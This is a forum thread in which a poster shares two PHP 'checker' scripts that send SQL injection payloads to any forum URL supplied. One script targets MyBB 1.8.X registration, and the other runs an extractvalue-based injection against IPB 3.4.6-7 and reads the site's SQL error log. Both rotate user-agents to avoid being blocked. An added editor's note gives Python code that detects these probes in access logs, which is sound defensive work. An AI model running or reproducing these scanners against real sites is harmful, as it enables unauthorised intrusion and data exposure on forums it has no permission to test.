MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Righteous - 01-20-2015
Mybb:
PHP Code:
<?php
if ( isset( $_GET[ 'q' ] ) ) {
    $host = $_GET[ 'q' ];
    //Making sure http or https is set
    if ( substr( $host, 0, 4 ) == "http" ) {
        $protocol = "http";
        if ( substr( $host, 0, 5 ) == "https" ) {
            $protocol = "https";
        }
        //Removing trailing slashes
        if ( substr( $host, -1 ) == '/' ) {
            $host = substr( $host, 0, -1 );
        }
        //Initial SQL Injection check
        $newHost = $host . '/member.php';
        $data = "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='";
        $response = SendPost( $newHost, $data );
        if ( strpos( $response, "You have an error in your SQL syntax" ) !== false ) {
            printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $host );
        } else {
            printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $host );
        }
    } else {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
    }
} else {
    echo "Invalid parameters, are you drunk?";
}

//Don't get user-agent blocked
function getRandomUserAgent() {
    $userAgents = array(
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
    );
    $random = rand( 0, count( $userAgents ) - 1 );
    return $userAgents[ $random ];
}

//Send a POST request
function SendPost( $site, $post ) {
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, "$site" );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $ch, CURLOPT_USERAGENT, getRandomUserAgent() );
    curl_setopt( $ch, CURLOPT_POSTFIELDS, $post );
    $response = curl_exec( $ch );
    curl_close( $ch );
    return $response;
}
?>
IPB:
PHP Code:
<?php
if (isset($_GET['q'])) {
    $host = $_GET['q'];
    //Ensures you have http or https in your domain name
    if (substr($host, 0, 4) == "http") {
        $protocol = "http";
        if (substr($host, 0, 5) == "https") {
            $protocol = "https";
        }
        //Removes any trailing slashes
        if (substr($host, -1) == '/') {
            $host = substr($host, 0, -1);
        }
        //Initial SQL Injection check
        $newHost = $host . '/interface/ipsconnect/ipsconnect.php';
        $sql = 'SELECT COUNT(*) FROM members';
        $data = "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELECT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
        $response = SendPost($newHost, $data);
        //Checking the SQL error log for confirmation
        $url = $host . '/cache/sql_error_latest.cgi';
        $response = SendGet($url);
        if (strpos($response, "XPATH syntax error") !== false) {
            printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
        } else {
            printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!", $host);
        }
        return false;
    } else {
        echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
    }
} else {
    echo "I think you're lost homie.";
}

//So you can't be blocked via user-agent
function getRandomUserAgent() {
    $userAgents = array(
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
        "Opera/9.20 (Windows NT 6.0; U; en)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
        "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
    );
    $random = rand(0, count($userAgents) - 1);
    return $userAgents[$random];
}

//Sends a POST request
function SendPost($site, $post) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

//Sends a GET request, specifically for reading the SQL error CGI
function SendGet($site) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site");
    curl_setopt($ch, CURLOPT_USERAGENT, getRandomUserAgent());
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}
?>
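Editor's note, added to this thread and not part of Righteous's post: a forum operator who wants to know whether these checkers have been run against their site can look for the traffic pattern the two scripts produce. Both scripts pick a User-Agent from the same short, hard-coded list; the IPB script POSTs to interface/ipsconnect/ipsconnect.php and then immediately GETs cache/sql_error_latest.cgi, a file no browsing user ever requests; the MyBB script POSTs a registration to member.php. The detection below parses Apache/nginx "combined" access-log lines, correlates the ipsconnect POST with the error-log read from the same client, and flags the user-agent fingerprint on member.php registrations. The log lines, IP addresses and the 30-second correlation window are constructed assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added detection example (not code from the original post). Sample log
# lines, IP addresses and the correlation window are constructed.

# User-Agent strings hard-coded in both posted checkers. On its own a match is
# a weak signal (old but real browser strings); combined with the paths below
# it fingerprints the tool.
CHECKER_USER_AGENTS = {
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
    "Opera/9.20 (Windows NT 6.0; U; en)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
    "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
    "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48",
}

# "combined" format: ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one IPB probe (first two lines), one MyBB probe (third),
# and a normal user registering through the browser (last two).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jan/2015:23:10:01 +0000] "POST /forums/interface/ipsconnect/ipsconnect.php HTTP/1.1" 200 512 "-" "Opera/9.20 (Windows NT 6.0; U; en)"',
    '203.0.113.7 - - [20/Jan/2015:23:10:02 +0000] "GET /forums/cache/sql_error_latest.cgi HTTP/1.1" 200 1840 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    '198.51.100.4 - - [20/Jan/2015:23:11:40 +0000] "POST /forums/member.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"',
    '192.0.2.9 - - [20/Jan/2015:23:12:00 +0000] "GET /forums/index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/39.0 Safari/537.36"',
    '192.0.2.9 - - [20/Jan/2015:23:12:30 +0000] "POST /forums/member.php HTTP/1.1" 200 3301 "http://forums.example/member.php?action=register" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/39.0 Safari/537.36"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def detect(lines, window=timedelta(seconds=30)):
    """Return (ip, severity, reason) findings in log order."""
    findings = []
    ipsconnect_posts = defaultdict(list)  # client ip -> times of POSTs to ipsconnect.php
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, t = rec["ip"], rec["path"], rec["time"]
        tool_ua = rec["ua"] in CHECKER_USER_AGENTS

        if rec["method"] == "POST" and path.endswith("/interface/ipsconnect/ipsconnect.php"):
            ipsconnect_posts[ip].append(t)

        if path.endswith("/cache/sql_error_latest.cgi"):
            # The IPB checker reads the SQL error log right after its POST;
            # the same client doing both inside the window is the strongest signal.
            prior = [p for p in ipsconnect_posts[ip] if t - window <= p <= t]
            if prior:
                findings.append((ip, "high", "ipsconnect.php POST followed by read of sql_error_latest.cgi"))
            else:
                findings.append((ip, "medium", "read of cache/sql_error_latest.cgi"))
        elif rec["method"] == "POST" and path.endswith("/member.php") and tool_ua:
            # Access logs carry no request body, so the question_id parameter is
            # invisible here; only the checker's user-agent list sets this apart.
            findings.append((ip, "low", "POST to member.php with checker user-agent"))
    return findings


if __name__ == "__main__":
    for ip, severity, reason in detect(SAMPLE_LOG):
        print(f"{severity:6s} {ip:15s} {reason}")
```

The MyBB side is the weak half of this: the access log shows only a POST to member.php, so the `question_id='` parameter and the "You have an error in your SQL syntax" text never reach it. To see those, correlate with the web server's PHP error log or the database error log, or a WAF that records request bodies. The user-agent list is likewise trivial for a probe to change, which is why it only ever raises a low-severity finding here.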
RE: MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Konloch - 01-20-2015
Why make this in PHP? Interesting nonetheless.
RE: MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker - Righteous - 01-21-2015
(01-20-2015, 11:34 PM)Konloch Wrote: Why make this in PHP? Interesting nonetheless.
Because I wanted people who couldn't run the python script to be able to check their shit.